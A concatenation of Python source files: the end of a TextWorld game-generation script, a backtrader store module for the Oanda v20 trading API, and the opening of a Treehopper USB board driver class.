cmd = "tw-make tw-iqa --nb-rooms " + str(num_room) + " --nb-entities " + str(num_object) + " --seed-map " + str(map_seed) + (" --with-placeholders" if with_placeholders else "") +\
" --third-party challenge.py --seed " + str(random_seed) + " --output " + gamefile + " --silent --kb " + pjoin(path, "textworld_data")
os.system(cmd)
return gamefile
def game_generator_queue(path="./", random_map=False, question_type="location", max_q_size=30, wait_time=0.5, nb_worker=1):
"""
create an asynchronous queue of game files for the unlimited games setting.
"""
q = mp.Queue()
nb_worker = min(nb_worker, mp.cpu_count() - 1)
def data_generator_task(p_num):
counter = 0
while True:
np.random.seed(p_num * 12345 + counter)
seed = np.random.randint(100000000)
if q.qsize() < max_q_size:
try:
if random_map:
game_file_name = generate_random_map_games(p_num, path=path, question_type=question_type, random_seed=seed)
else:
game_file_name = generate_fixed_map_games(p_num, path=path, question_type=question_type, random_seed=seed)
except ValueError:
continue
q.put(game_file_name)
else:
time.sleep(wait_time)
counter += 1
generator_processes = [mp.Process(target=data_generator_task, args=(p_num,)) for p_num in range(nb_worker)]
for p in generator_processes:
p.daemon = True
p.start()
return q
def game_generator(path="./", random_map=False, question_type="location", train_data_size=1):
"""
Generate all the games for training.
:param path: the path where to create the games.
:param random_map: boolean for whether to create random map games or fixed.
:param question_type: the type of question of games to generate.
:param train_data_size: the number of training games to create.
:return res: a list of game file directory locations
"""
print("Generating %s games..." % str(train_data_size))
res = set()
if random_map:
this_many_rooms = np.linspace(2, 12, train_data_size + 2)[1:-1]
this_many_rooms = [int(item) for item in this_many_rooms]
this_many_objects = []
for i in range(len(this_many_rooms)):
# ith game
tmp = np.linspace(this_many_rooms[i] * 3, this_many_rooms[i] * 6, train_data_size + 2)[1:-1]
tmp = [int(item) for item in tmp]
if tmp[i] <= this_many_rooms[i] * 3:
tmp[i] = this_many_rooms[i] * 3 + 1
this_many_objects.append(tmp[i])
else:
this_many_rooms = 6
this_many_objects = np.linspace(this_many_rooms * 3, this_many_rooms * 6, train_data_size + 2)[1:-1]
this_many_objects = [int(item) for item in this_many_objects]
for i in range(len(this_many_objects)):
if this_many_objects[i] <= this_many_rooms * 3:
this_many_objects[i] = this_many_rooms * 3 + 1
while(True):
if len(res) == train_data_size:
break
_id = len(res)
try:
if random_map:
game_file_name = generate_random_map_games(len(res), path=path, question_type=question_type, random_seed=123 + _id, num_room=this_many_rooms[_id], num_object=this_many_objects[_id])
else:
game_file_name = generate_fixed_map_games(len(res), path=path, question_type=question_type, random_seed=123 + _id, num_object=this_many_objects[_id])
except ValueError:
continue
res.add(game_file_name)
print("Done generating games...")
return list(res)
|
oandav20store.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import collections
import threading
import copy
import json
import time as _time
from datetime import datetime, timezone
import v20
import backtrader as bt
from backtrader.metabase import MetaParams
from backtrader.utils.py3 import queue, with_metaclass
from .oandaposition import OandaPosition
class SerializableEvent(object):
'''A threading.Event that can be serialized.'''
def __init__(self):
self.evt = threading.Event()
def set(self):
return self.evt.set()
def clear(self):
return self.evt.clear()
def isSet(self):
return self.evt.isSet()
def wait(self, timeout=0):
return self.evt.wait(timeout)
def __getstate__(self):
d = copy.copy(self.__dict__)
if self.evt.isSet():
d['evt'] = True
else:
d['evt'] = False
return d
def __setstate__(self, d):
self.evt = threading.Event()
if d['evt']:
self.evt.set()
class MetaSingleton(MetaParams):
'''Metaclass to make a metaclassed class a singleton'''
def __init__(cls, name, bases, dct):
super(MetaSingleton, cls).__init__(name, bases, dct)
cls._singleton = None
def __call__(cls, *args, **kwargs):
if cls._singleton is None:
cls._singleton = (
super(MetaSingleton, cls).__call__(*args, **kwargs))
return cls._singleton
class OandaV20Store(with_metaclass(MetaSingleton, object)):
'''Singleton class wrapping to control the connections to Oanda v20.
Params:
- ``token`` (default:``None``): API access token
- ``account`` (default: ``None``): account id
- ``practice`` (default: ``False``): use the test environment
- ``account_poll_freq`` (default: ``5.0``): refresh frequency for
account value/cash refresh
- ``stream_timeout`` (default: ``2``): timeout for stream requests
- ``poll_timeout`` (default: ``2``): timeout for poll requests
- ``reconnections`` (default: ``-1``): number of reconnection attempts on
connection errors (``-1`` retries forever)
- ``reconntimeout`` (default: ``5.0``): how long to wait before reconnecting
the stream (feeds have their own reconnection settings)
- ``notif_transactions`` (default: ``False``): notify the store of all received
transactions
'''
params = dict(
token='',
account='',
practice=False,
# account balance refresh timeout
account_poll_freq=5.0,
# stream timeout
stream_timeout=2,
# poll timeout
poll_timeout=2,
# count of reconnections, -1 unlimited, 0 none
reconnections=-1,
# timeout between reconnections
reconntimeout=5.0,
# send store notification with received transactions
notif_transactions=False,
)
BrokerCls = None # broker class will auto register
DataCls = None # data class will auto register
# Oanda supported granularities
'''S5, S10, S15, S30, M1, M2, M3, M4, M5, M10, M15, M30, H1,
H2, H3, H4, H6, H8, H12, D, W, M'''
_GRANULARITIES = {
(bt.TimeFrame.Seconds, 5): 'S5',
(bt.TimeFrame.Seconds, 10): 'S10',
(bt.TimeFrame.Seconds, 15): 'S15',
(bt.TimeFrame.Seconds, 30): 'S30',
(bt.TimeFrame.Minutes, 1): 'M1',
(bt.TimeFrame.Minutes, 2): 'M2',
(bt.TimeFrame.Minutes, 3): 'M3',
(bt.TimeFrame.Minutes, 4): 'M4',
(bt.TimeFrame.Minutes, 5): 'M5',
(bt.TimeFrame.Minutes, 10): 'M10',
(bt.TimeFrame.Minutes, 15): 'M15',
(bt.TimeFrame.Minutes, 30): 'M30',
(bt.TimeFrame.Minutes, 60): 'H1',
(bt.TimeFrame.Minutes, 120): 'H2',
(bt.TimeFrame.Minutes, 180): 'H3',
(bt.TimeFrame.Minutes, 240): 'H4',
(bt.TimeFrame.Minutes, 360): 'H6',
(bt.TimeFrame.Minutes, 480): 'H8',
(bt.TimeFrame.Minutes, 720): 'H12',
(bt.TimeFrame.Days, 1): 'D',
(bt.TimeFrame.Weeks, 1): 'W',
(bt.TimeFrame.Months, 1): 'M',
}
# Order type matching with oanda
_ORDEREXECS = {
bt.Order.Market: 'MARKET',
bt.Order.Limit: 'LIMIT',
bt.Order.Stop: 'STOP',
bt.Order.StopTrail: 'TRAILING_STOP_LOSS'
}
# transactions which will be emitted on creating/accepting a order
_X_CREATE_TRANS = ['MARKET_ORDER',
'LIMIT_ORDER',
'STOP_ORDER',
'TAKE_PROFIT_ORDER',
'STOP_LOSS_ORDER',
'MARKET_IF_TOUCHED_ORDER',
'TRAILING_STOP_LOSS_ORDER']
# transactions which filled orders
_X_FILL_TRANS = ['ORDER_FILL']
# transactions which cancelled orders
_X_CANCEL_TRANS = ['ORDER_CANCEL']
# transactions which were rejected
_X_REJECT_TRANS = ['MARKET_ORDER_REJECT',
'LIMIT_ORDER_REJECT',
'STOP_ORDER_REJECT',
'TAKE_PROFIT_ORDER_REJECT',
'STOP_LOSS_ORDER_REJECT',
'MARKET_IF_TOUCHED_ORDER_REJECT',
'TRAILING_STOP_LOSS_ORDER_REJECT']
# transactions which can be ignored
_X_IGNORE_TRANS = ['DAILY_FINANCING',
'CLIENT_CONFIGURE']
# Date format used
_DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.%f000Z'
# Oanda api endpoints
_OAPI_URL = ['api-fxtrade.oanda.com',
'api-fxpractice.oanda.com']
_OAPI_STREAM_URL = ['stream-fxtrade.oanda.com',
'stream-fxpractice.oanda.com']
@classmethod
def getdata(cls, *args, **kwargs):
'''Returns ``DataCls`` with args, kwargs'''
return cls.DataCls(*args, **kwargs)
@classmethod
def getbroker(cls, *args, **kwargs):
'''Returns broker with *args, **kwargs from registered ``BrokerCls``'''
return cls.BrokerCls(*args, **kwargs)
def __init__(self):
'''Initialization'''
super(OandaV20Store, self).__init__()
self.notifs = collections.deque() # store notifications for cerebro
self._cash = 0.0 # margin available, currently available cash
self._value = 0.0 # account balance
self._currency = None # account currency
self._leverage = 1 # leverage
self._client_id_prefix = str(datetime.now().timestamp())
self.broker = None # broker instance
self.datas = list() # datas that have registered over start
self._env = None # reference to cerebro for general notifications
self._evt_acct = SerializableEvent()
self._orders = collections.OrderedDict() # map order.ref to order id
self._trades = collections.OrderedDict() # map order.ref to trade id
self._server_positions = collections.defaultdict(OandaPosition)
# init oanda v20 api context
self.oapi = v20.Context(
self._OAPI_URL[int(self.p.practice)],
poll_timeout=self.p.poll_timeout,
port=443,
ssl=True,
token=self.p.token,
datetime_format='UNIX',
)
# init oanda v20 api stream context
self.oapi_stream = v20.Context(
self._OAPI_STREAM_URL[int(self.p.practice)],
stream_timeout=self.p.stream_timeout,
port=443,
ssl=True,
token=self.p.token,
datetime_format='UNIX',
)
def start(self, data=None, broker=None):
# datas require some processing to kickstart data reception
if data is None and broker is None:
self.cash = None
return
if data is not None:
self._env = data._env
# For datas simulate a queue with None to kickstart co
self.datas.append(data)
if self.broker is not None:
self.broker.data_started(data)
elif broker is not None:
self.broker = broker
self.streaming_events()
self.broker_threads()
def stop(self):
# signal end of thread
if self.broker is not None:
self.q_ordercreate.put(None)
self.q_orderclose.put(None)
self.q_account.put(None)
def put_notification(self, msg, *args, **kwargs):
'''Adds a notification'''
self.notifs.append((msg, args, kwargs))
def get_notifications(self):
'''Return the pending "store" notifications'''
self.notifs.append(None) # put a mark / threads could still append
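# popleft() until the None marker: notifications appended concurrently by other
# threads after this call stay in the deque for the next call.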
return [x for x in iter(self.notifs.popleft, None)]
def get_positions(self):
'''Returns the currently open positions'''
try:
response = self.oapi.position.list_open(self.p.account)
pos = response.get('positions', 200)
# convert positions to dict
for idx, val in enumerate(pos):
pos[idx] = val.dict()
_utc_now = datetime.utcnow()
for p in pos:
size = float(p['long']['units']) + float(p['short']['units'])
price = (
float(p['long']['averagePrice']) if size > 0
else float(p['short']['averagePrice']))
self._server_positions[p['instrument']] = OandaPosition(size, price, dt=_utc_now)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return pos
except NameError:
return None
def get_server_position(self, update_latest=False):
if update_latest:
self.get_positions()
return self._server_positions
def get_granularity(self, timeframe, compression):
'''Returns the granularity useable for oanda'''
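# e.g. get_granularity(bt.TimeFrame.Minutes, 60) returns 'H1'; unsupported
# combinations return None.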
return self._GRANULARITIES.get((timeframe, compression), None)
def get_instrument(self, dataname):
'''Returns details about the requested instrument'''
try:
response = self.oapi.account.instruments(
self.p.account,
instruments=dataname)
inst = response.get('instruments', 200)
# convert instruments to dict
for idx, val in enumerate(inst):
inst[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return inst[0]
except NameError:
return None
def get_instruments(self, dataname):
'''Returns details about available instruments'''
try:
response = self.oapi.account.instruments(
self.p.account,
instruments=dataname)
inst = response.get('instruments', 200)
# convert instruments to dict
for idx, val in enumerate(inst):
inst[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return inst
except NameError:
return None
def get_pricing(self, dataname):
'''Returns details about current price'''
try:
response = self.oapi.pricing.get(self.p.account,
instruments=dataname)
prices = response.get('prices', 200)
# convert prices to dict
for idx, val in enumerate(prices):
prices[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return prices[0]
except NameError:
return None
def get_pricings(self, dataname):
'''Returns details about current prices'''
try:
response = self.oapi.pricing.get(self.p.account,
instruments=dataname)
prices = response.get('prices', 200)
# convert prices to dict
for idx, val in enumerate(prices):
prices[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return prices
except NameError:
return None
def get_transactions_range(self, from_id, to_id, exclude_outer=False):
'''Returns all transactions in the given id range'''
try:
response = self.oapi.transaction.range(
self.p.account,
fromID=from_id,
toID=to_id)
transactions = response.get('transactions', 200)
if exclude_outer:
del transactions[0], transactions[-1]
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return transactions
except NameError:
return None
def get_transactions_since(self, id):
'''Returns all transactions since id'''
try:
response = self.oapi.transaction.since(
self.p.account,
id=id)
transactions = response.get('transactions', 200)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return transactions
except NameError:
return None
def get_cash(self):
'''Returns the available cash'''
return self._cash
def get_value(self):
'''Returns the account balance'''
return self._value
def get_currency(self):
'''Returns the currency of the account'''
return self._currency
def get_leverage(self):
'''Returns the leverage of the account'''
return self._leverage
def broker_threads(self):
'''Creates threads for broker functionality'''
self.q_account = queue.Queue()
self.q_account.put(True) # force an immediate update
t = threading.Thread(target=self._t_account)
t.daemon = True
t.start()
self.q_ordercreate = queue.Queue()
t = threading.Thread(target=self._t_order_create)
t.daemon = True
t.start()
self.q_orderclose = queue.Queue()
t = threading.Thread(target=self._t_order_cancel)
t.daemon = True
t.start()
# Wait once for the values to be set
self._evt_acct.wait(self.p.account_poll_freq)
def streaming_events(self):
'''Creates threads for event streaming'''
q = queue.Queue()
kwargs = {'q': q}
t = threading.Thread(target=self._t_streaming_events, kwargs=kwargs)
t.daemon = True
t.start()
return q
def streaming_prices(self, dataname):
'''Creates threads for price streaming'''
q = queue.Queue()
kwargs = {'q': q, 'dataname': dataname}
t = threading.Thread(target=self._t_streaming_prices, kwargs=kwargs)
t.daemon = True
t.start()
return q
def order_create(self, order, stopside=None, takeside=None, **kwargs):
'''Creates an order'''
okwargs = dict()
okwargs['instrument'] = order.data._dataname
okwargs['units'] = (
abs(int(order.created.size)) if order.isbuy()
else -abs(int(order.created.size))) # negative for selling
okwargs['type'] = self._ORDEREXECS[order.exectype]
okwargs['replace'] = order.info.get('replace', None)
okwargs['replace_type'] = order.info.get('replace_type', None)
if order.exectype != bt.Order.Market:
okwargs['price'] = format(
order.created.price,
'.%df' % order.data.contractdetails['displayPrecision'])
if order.valid is None:
okwargs['timeInForce'] = 'GTC' # good till cancelled
else:
okwargs['timeInForce'] = 'GTD' # good till date
gtdtime = order.data.num2date(order.valid, tz=timezone.utc)
okwargs['gtdTime'] = gtdtime.strftime(self._DATE_FORMAT)
if order.exectype == bt.Order.StopTrail:
if okwargs['replace'] is None:
raise Exception('replace param needed for StopTrail order')
trailamount = order.trailamount
if order.trailpercent:
trailamount = order.price * order.trailpercent
okwargs['distance'] = format(
trailamount,
'.%df' % order.data.contractdetails['displayPrecision'])
if stopside is not None:
if stopside.exectype == bt.Order.StopTrail:
trailamount = stopside.trailamount
if stopside.trailpercent:
trailamount = order.price * stopside.trailpercent
okwargs['trailingStopLossOnFill'] = v20.transaction.TrailingStopLossDetails(
distance=format(
trailamount,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(stopside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
else:
okwargs['stopLossOnFill'] = v20.transaction.StopLossDetails(
price=format(
stopside.price,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(stopside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
if takeside is not None and takeside.price is not None:
okwargs['takeProfitOnFill'] = v20.transaction.TakeProfitDetails(
price=format(
takeside.price,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(takeside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
# store backtrader order ref in client extensions
okwargs['clientExtensions'] = v20.transaction.ClientExtensions(
id=self._oref_to_client_id(order.ref),
comment=json.dumps(order.info)
).dict()
okwargs.update(**kwargs) # anything from the user
self.q_ordercreate.put((order.ref, okwargs,))
# notify orders of being submitted
self.broker._submit(order.ref)
if stopside is not None: # don't make price on stopside mandatory
self.broker._submit(stopside.ref)
if takeside is not None and takeside.price is not None:
self.broker._submit(takeside.ref)
return order
def order_cancel(self, order):
'''Cancels a order'''
self.q_orderclose.put(order.ref)
return order
def candles(self, dataname, dtbegin, dtend, timeframe, compression,
candleFormat, includeFirst=True, onlyComplete=True):
'''Returns historical rates'''
q = queue.Queue()
kwargs = {'dataname': dataname, 'dtbegin': dtbegin, 'dtend': dtend,
'timeframe': timeframe, 'compression': compression,
'candleFormat': candleFormat, 'includeFirst': includeFirst,
'onlyComplete': onlyComplete, 'q': q}
t = threading.Thread(target=self._t_candles, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _oref_to_client_id(self, oref):
'''Converts an oref to a client id'''
id = '{}-{}'.format(self._client_id_prefix, oref)
return id
def _client_id_to_oref(self, client_id):
'''Converts a client id back to an oref'''
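# Illustrative example (the prefix is this store's startup timestamp): a client
# id such as '1618822400.123456-7' maps back to oref 7; ids created by another
# process (different prefix) return None.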
oref = None
if str(client_id).startswith(self._client_id_prefix):
oref = int(str(client_id)[len(self._client_id_prefix)+1:])
return oref
def _t_account(self):
'''Callback method for account request'''
while True:
try:
msg = self.q_account.get(timeout=self.p.account_poll_freq)
if msg is None:
break # end of thread
except queue.Empty: # timeout -> time to refresh
pass
try:
response = self.oapi.account.summary(self.p.account)
accinfo = response.get('account', 200)
response = self.oapi.position.list_open(self.p.account)
pos = response.get('positions', 200)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if self.p.reconnections == 0:
self.put_notification('Giving up fetching account summary')
return
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
return
try:
self._cash = accinfo.marginAvailable
self._value = accinfo.balance
self._currency = accinfo.currency
self._leverage = 1/accinfo.marginRate
#reset
self._server_positions = collections.defaultdict(OandaPosition)
#Position
# convert positions to dict
_utc_now = datetime.utcnow()
for idx, val in enumerate(pos):
pos[idx] = val.dict()
for p in pos:
size = float(p['long']['units']) + float(p['short']['units'])
price = (
float(p['long']['averagePrice']) if size > 0
else float(p['short']['averagePrice']))
self._server_positions[p['instrument']] = OandaPosition(size, price,dt=_utc_now)
except KeyError:
pass
# notify of success, initialization waits for it
self._evt_acct.set()
def _t_streaming_events(self, q):
'''Callback method for streaming events'''
last_id = None
reconnections = 0
while True:
try:
response = self.oapi_stream.transaction.stream(
self.p.account
)
# process response
for msg_type, msg in response.parts():
if msg_type == 'transaction.TransactionHeartbeat':
if not last_id:
last_id = msg.lastTransactionID
# if a reconnection occurred
if reconnections > 0:
if last_id:
# get all transactions between the last seen and first from
# reconnected stream
old_transactions = self.get_transactions_since(
last_id)
for t in old_transactions:
if msg_type == 'transaction.Transaction':
if t.id > last_id:
self._transaction(t.dict())
last_id = t.id
reconnections = 0
if msg_type == 'transaction.Transaction':
if not last_id or msg.id > last_id:
self._transaction(msg.dict())
last_id = msg.id
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if (self.p.reconnections == 0 or self.p.reconnections > 0
and reconnections > self.p.reconnections):
# unable to reconnect after x times
self.put_notification('Giving up reconnecting streaming events')
return
reconnections += 1
if self.p.reconntimeout is not None:
_time.sleep(self.p.reconntimeout)
self.put_notification('Trying to reconnect streaming events ({} of {})'.format(
reconnections,
self.p.reconnections))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
def _t_streaming_prices(self, dataname, q):
'''Callback method for streaming prices'''
try:
response = self.oapi_stream.pricing.stream(
self.p.account,
instruments=dataname,
)
# process response
for msg_type, msg in response.parts():
if msg_type == 'pricing.ClientPrice':
# put price into queue as dict
q.put(msg.dict())
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
# notify feed of error
q.put({'msg': 'CONNECTION_ISSUE'})
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
def _t_candles(self, dataname, dtbegin, dtend, timeframe, compression,
candleFormat, includeFirst, onlyComplete, q):
'''Callback method for candles request'''
granularity = self.get_granularity(timeframe, compression)
if granularity is None:
q.put(None)
return
dtkwargs = {}
if dtbegin is not None:
dtkwargs['fromTime'] = dtbegin.strftime(self._DATE_FORMAT)
dtkwargs['includeFirst'] = includeFirst
count = 0
reconnections = 0
while True:
if count > 1:
dtkwargs['includeFirst'] = False
try:
response = self.oapi.instrument.candles(
dataname,
granularity=granularity,
price=candleFormat,
**dtkwargs)
candles = response.get('candles', 200)
reconnections = 0
count += 1
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if (self.p.reconnections == 0 or self.p.reconnections > 0
and reconnections > self.p.reconnections):
self.put_notification('Giving up fetching candles')
return
reconnections += 1
if self.p.reconntimeout is not None:
_time.sleep(self.p.reconntimeout)
self.put_notification(
'Trying to fetch candles ({} of {})'.format(
reconnections,
self.p.reconnections))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
continue
dtobj = None
for candle in candles:
# get current candle time
dtobj = datetime.utcfromtimestamp(float(candle.time))
# if end time is provided, check if time is reached for
# every candle
if dtend is not None and dtobj > dtend:
break
# add candle
if not onlyComplete or candle.complete:
q.put(candle.dict())
if dtobj is not None:
dtkwargs['fromTime'] = dtobj.strftime(self._DATE_FORMAT)
elif dtobj is None:
break
if dtend is not None and dtobj > dtend:
break
if len(candles) == 0:
break
q.put({}) # end of transmission
def _transaction(self, trans):
if self.p.notif_transactions:
self.put_notification(str(trans))
oid = None
ttype = trans['type']
if ttype in self._X_CREATE_TRANS:
# get order id (matches transaction id)
oid = trans['id']
oref = None
# identify backtrader order by checking client
# extensions (this is set when creating a order)
if 'clientExtensions' in trans:
# assume backtrader created the order for this transaction
oref = self._client_id_to_oref(trans['clientExtensions']['id'])
if oref is not None:
self._orders[oid] = oref
elif ttype in self._X_FILL_TRANS:
# order was filled, notify backtrader of it
oid = trans['orderID']
elif ttype in self._X_CANCEL_TRANS:
# order was cancelled, notify backtrader of it
oid = trans['orderID']
elif ttype in self._X_REJECT_TRANS:
# transaction was rejected, notify backtrader of it
oid = trans['requestID']
elif ttype in self._X_IGNORE_TRANS:
# transaction can be ignored
msg = 'Received transaction {} with id {}. Ignoring transaction.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
else:
msg = 'Received transaction {} with id {}. Unknown situation.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
return
if oid in self._orders:
# when an order id exists process transaction
self._process_transaction(oid, trans)
self._process_trades(self._orders[oid], trans)
else:
# external order created this transaction
self.get_server_position(update_latest=True)
if self.broker.p.use_positions and ttype in self._X_FILL_TRANS:
size = float(trans['units'])
price = float(trans['price'])
for data in self.datas:
if data._name == trans['instrument']:
self.broker._fill_external(data, size, price)
break
elif ttype not in self._X_IGNORE_TRANS:
# notify about unknown transaction
if self.broker.p.use_positions:
msg = 'Received external transaction {} with id {}. Skipping transaction.'
else:
msg = 'Received external transaction {} with id {}. Positions and trades may not match anymore.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
def _process_transaction(self, oid, trans):
try:
# get a reference to a backtrader order based on
# the order id / trade id
oref = self._orders[oid]
except KeyError:
return
ttype = trans['type']
if ttype in self._X_CREATE_TRANS:
self.broker._accept(oref)
elif ttype in self._X_FILL_TRANS:
size = float(trans['units'])
price = float(trans['price'])
self.broker._fill(oref, size, price, reason=trans['reason'])
# store trade ids which were generated by the order
if 'tradeOpened' in trans:
self._orders[trans['tradeOpened']['tradeID']] = oref
if 'tradeReduced' in trans:
self._orders[trans['tradeReduced']['tradeID']] = oref
elif ttype in self._X_CANCEL_TRANS:
reason = trans['reason']
if reason == 'TIME_IN_FORCE_EXPIRED':
self.broker._expire(oref)
else:
self.broker._cancel(oref)
elif ttype in self._X_REJECT_TRANS:
self.broker._reject(oref)
def _process_trades(self, oref, trans):
if 'tradeID' in trans:
self._trades[oref] = trans['tradeID']
if 'tradeOpened' in trans:
self._trades[oref] = trans['tradeOpened']['tradeID']
if 'tradeClosed' in trans:
self._trades[oref] = trans['tradeClosed']['tradeID']
if 'tradesClosed' in trans:
for t in trans['tradesClosed']:
for key, value in self._trades.copy().items():
if value == t['tradeID']:
del self._trades[key]
def _t_order_create(self):
while True:
msg = self.q_ordercreate.get()
if msg is None:
break
oref, okwargs = msg
try:
if okwargs['replace']:
oid = '@{}'.format(
self._oref_to_client_id(okwargs['replace']))
if okwargs['replace'] in self._trades:
okwargs['tradeID'] = self._trades[okwargs['replace']]
if okwargs['replace_type']:
okwargs['type'] = okwargs['replace_type']
response = self.oapi.order.replace(
self.p.account,
oid,
order=okwargs)
else:
response = self.oapi.order.create(
self.p.account,
order=okwargs)
# get the transaction which created the order
o = response.get('orderCreateTransaction', 201)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
self.broker._reject(oref)
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
self.broker._reject(oref)
continue
def _t_order_cancel(self):
while True:
oref = self.q_orderclose.get()
if oref is None:
break
oid = None
for key, value in self._orders.items():
if value == oref:
oid = key
break
if oid is None:
continue # the order is no longer there
try:
# TODO either close pending orders or filled trades
response = self.oapi.order.cancel(self.p.account, oid)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
continue
self.broker._cancel(oref)
def _create_error_notif(self, e, response):
try:
notif = '{}: {} - {}'.format(
response.status,
response.reason,
response.get('errorMessage'))
except Exception:
notif = str(e)
return notif
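# Rough usage sketch (token/account values are placeholders; the broker and data
# classes auto-register from their own modules, so this assumes those modules
# have been imported):
#   store = OandaV20Store(token="<api-token>", account="<account-id>", practice=True)
#   cerebro = bt.Cerebro()
#   cerebro.setbroker(store.getbroker())
#   data = store.getdata(dataname="EUR_USD", timeframe=bt.TimeFrame.Minutes, compression=5)
#   cerebro.adddata(data)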
|
treehopper_usb.py
|
import threading
from time import sleep
from typing import List
import usb.core
import usb.util
from treehopper.api.device_commands import DeviceCommands
from treehopper.api.i2c import HardwareI2C
from treehopper.api.pin import Pin, SoftPwmManager
from treehopper.api.pwm import HardwarePwm
from treehopper.api.pwm import HardwarePwmManager
from treehopper.api.spi import HardwareSpi
from treehopper.api.uart import HardwareUart
from treehopper.utils.event_handler import EventHandler
class TreehopperUsb:
"""The core class for communicating with Treehopper USB boards.
Core hardware
=============
%Treehopper is a USB 2.0 Full Speed device with 20 \link pin.Pin Pins\endlink, each of which can be used as an
analog input, digital input, digital output, or soft-PWM output. Many of these pins also have dedicated peripheral
functions for \link spi.HardwareSpi SPI\endlink, \link i2c.HardwareI2C I2C\endlink,\link uart.HardwareUart
UART\endlink, and \link pwm.HardwarePwm PWM\endlink.
You'll access all the pins, peripherals, and board functions through this class, which will automatically create
all peripheral instances for you.
Example:
>>> board = find_boards()[0] # Get the first board.
>>> board.connect() # Be sure to connect before doing anything else.
>>> board.led = True # Turn on the board's LED.
>>> imu = Mpu9250.probe(board.i2c) # Connect an MPU9250 9-DoF IMU to the I2C interface on the board.
>>> print(imu.accelerometer) # Print the acceleration reading from the sensor.
'[0.95, 0.01, 0.03]'
>>> board.disconnect() # Disconnect from the board when finished.
Getting a board reference
-------------------------
To obtain a reference to the board, use the \link treehopper.api.find_boards.find_boards() find_boards()\endlink
method:
>>> board = find_boards()[0] # Get the first board.
\warning While you're free to create TreehopperUsb variables that reference boards, do not attempt to create a
TreehopperUsb instance manually; always obtain references to boards from the \link
treehopper.api.find_boards.find_boards() find_boards()\endlink function.
Connect to the board
--------------------
Before you use the board, you must explicitly connect to it by calling the connect() method
>>> board = find_boards()[0] # Get the first board.
>>> board.connect() # Be sure to connect before doing anything else.
\note Once a board is connected, other applications won't be able to use it.
On-board LED
------------
The only peripheral directly exposed by this class is the #led property, which will control the LED's state once
the board is connected. This demo will blink the LED until the board is unplugged:
>>> board = find_boards()[0]
>>> board.connect()
>>> while board.connected:
>>> board.led = not board.led # toggle the LED
>>> sleep(0.1)
Next steps
==========
To learn about accessing different %Treehopper peripherals, visit the doc links to the relevant classes:
\li \link pin.Pin Pin\endlink
\li \link spi.HardwareSpi HardwareSpi\endlink
\li \link i2c.HardwareI2C HardwareI2C\endlink
\li \link uart.HardwareUart HardwareUart\endlink
\li \link pwm.HardwarePwm HardwarePwm\endlink
"""
## \cond PRIVATE
def __init__(self, dev: usb.core.Device):
self._pin_listener_thread = threading.Thread(target=self._pin_listener)
self._dev = dev
self._comms_lock = threading.Lock()
self._pin_update_flag = threading.Event()
self._pin_report_endpoint = 0x81
self._peripheral_response_endpoint = 0x82
self._pin_config_endpoint = 0x01
self._peripheral_config_endpoint = 0x02
self._pins = [] # type: List[Pin]
for i in range(20):
self.pins.append(Pin(self, i))
self.pins[0].name = "Pin 0 (SCK)"
self.pins[1].name = "Pin 1 (MISO)"
self.pins[2].name = "Pin 2 (MOSI)"
self.pins[3].name = "Pin 3 (SDA)"
self.pins[4].name = "Pin 4 (SCL)"
self.pins[5].name = "Pin 5 (TX)"
self.pins[6].name = "Pin 6 (RX)"
self.pins[7].name = "Pin 7 (PWM1)"
self.pins[8].name = "Pin 8 (PWM2)"
self.pins[9].name = "Pin 9 (PWM3)"
self._spi = HardwareSpi(self)
self._i2c = HardwareI2C(self)
self._uart = HardwareUart(self)
self._pwm1 = HardwarePwm(self.pins[7])
self._pwm2 = HardwarePwm(self.pins[8])
self._pwm3 = HardwarePwm(self.pins[9])
self._hardware_pwm_manager = HardwarePwmManager(self)
self._soft_pwm_manager = SoftPwmManager(self)
self._led = False
self._connected = False
self._pin_report_received = EventHandler(self)
## \endcond
## @name Main components
# @{
def connect(self):
"""
Connect to the board.
